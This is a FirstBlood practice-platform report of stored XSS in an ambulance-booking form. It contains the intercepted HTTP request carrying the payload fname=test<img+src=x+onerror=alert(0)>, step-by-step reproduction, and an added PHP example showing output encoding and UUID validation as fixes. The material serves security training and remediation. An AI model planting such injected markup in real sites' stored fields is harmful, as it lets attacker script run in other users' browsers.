FirstBlood #1002: XSS on /api/ambulances.php?select=
This issue was discovered on FirstBlood v3



On 2022-12-08, properlay Level 7 reported:

Hello, I found an XSS vulnerability on /api/ambulances.php?select=.

When booking an appointment, the first name and last name fields are vulnerable to XSS.

To reproduce:

  1. When booking an appointment, turn Burp Suite intercept ON.

  2. Fill in all the required info and click Book Appointment.

  3. In the intercepted request, change the first name (fname) value to fname=test<img+src=x+onerror=alert(0)>

  4. Add the parameter ambulance=1 to the request to enable ambulance.

The intercepted request looks like:

POST /api/ba.php HTTP/1.1
Host: 7b0a93c7239c-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 73412-7048-28167
Content-Length: 198
Origin: https://7b0a93c7239c-properlay.a.firstbloodhackers.com
Referer: https://7b0a93c7239c-properlay.a.firstbloodhackers.com/book-appointment.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

fname=test<img+src=x+onerror=alert(0)>&lname=test<h2&address=test<h2&city=test<h2&phonenumber=test<h2&email=test<h2&dob=12/04/2022&a1=test<h2&a2=test<h2&a3=test<h2&message=test<h2&slot=3&ambulance=1

  5. Forward the request and copy your AppointmentID. (My AppointmentID is 5343f452-5a7d-424a-abc4-87f2063ccdc6)

  6. Then visit https://7b0a93c7239c-properlay.a.firstbloodhackers.com/api/ambulances.php?select=5343f452-5a7d-424a-abc4-87f2063ccdc6 (you need to add your own ID).

  7. You will see the XSS execute.

P2 High


FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the user's first/last name. For this to work, the parameter ambulance=1 must be set.
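The root cause above is a stored value (fname/lname from the booking request) being written into the ambulances.php response without HTML encoding. The following is an added example, not FirstBlood's own code: it models the appointment record as a PHP array, shows a vulnerable rendering beside one that encodes at the point of output, and validates the select parameter as a UUID before any lookup. The record shape, the function names (render_vulnerable, render_safe, h, is_valid_appointment_id) and the output markup are assumptions made for the illustration.

```php
<?php
// Added example (not the FirstBlood code base). Demonstrates why the payload
// from this report executes and how output encoding neutralises it.

// Constructed record mirroring the report: fname carries the reporter's payload
// and the AppointmentID is the one quoted in the write-up.
$appointment = [
    'id'        => '5343f452-5a7d-424a-abc4-87f2063ccdc6',
    'fname'     => 'test<img src=x onerror=alert(0)>',
    'lname'     => 'test<h2',
    'ambulance' => 1,
];

// Vulnerable rendering (assumed shape of the bug): stored fields are
// concatenated straight into HTML, so the <img onerror=...> stored in fname
// becomes live markup for whoever loads /api/ambulances.php?select={id}.
function render_vulnerable(array $a): string
{
    return '<p>Ambulance booked for ' . $a['fname'] . ' ' . $a['lname'] . '</p>';
}

// HTML-encode for a text/attribute context. ENT_QUOTES handles both quote
// styles, so the same helper is safe inside quoted attribute values as well;
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently producing an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened rendering: identical markup, but every user-controlled value goes
// through h() at output time. Encoding here (rather than stripping at input)
// means the same stored name is also safe wherever else it is displayed.
function render_safe(array $a): string
{
    return '<p>Ambulance booked for ' . h($a['fname']) . ' ' . h($a['lname']) . '</p>';
}

// Separate check for the select parameter itself: the IDs in the report are
// UUIDs, so reject anything that is not one before it reaches a query or the page.
function is_valid_appointment_id(string $id): bool
{
    return (bool) preg_match(
        '/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i',
        $id
    );
}

// Stand-alone run: compare the two renderings for the constructed record.
echo "vulnerable: ", render_vulnerable($appointment), PHP_EOL;
echo "encoded:    ", render_safe($appointment), PHP_EOL;
echo "id valid:   ", var_export(is_valid_appointment_id($appointment['id']), true), PHP_EOL;
echo "id valid:   ", var_export(is_valid_appointment_id('5343<script>'), true), PHP_EOL;
```

The encoded rendering turns `<` and `>` into `&lt;` and `&gt;`, so the browser displays the name literally instead of creating an img element and firing onerror. The UUID check is a defence-in-depth addition: it does not fix the stored XSS on its own (the payload lives in the name fields, not in select), but it removes a second user-controlled value from the response path.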

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the first to discover this bug! Great work.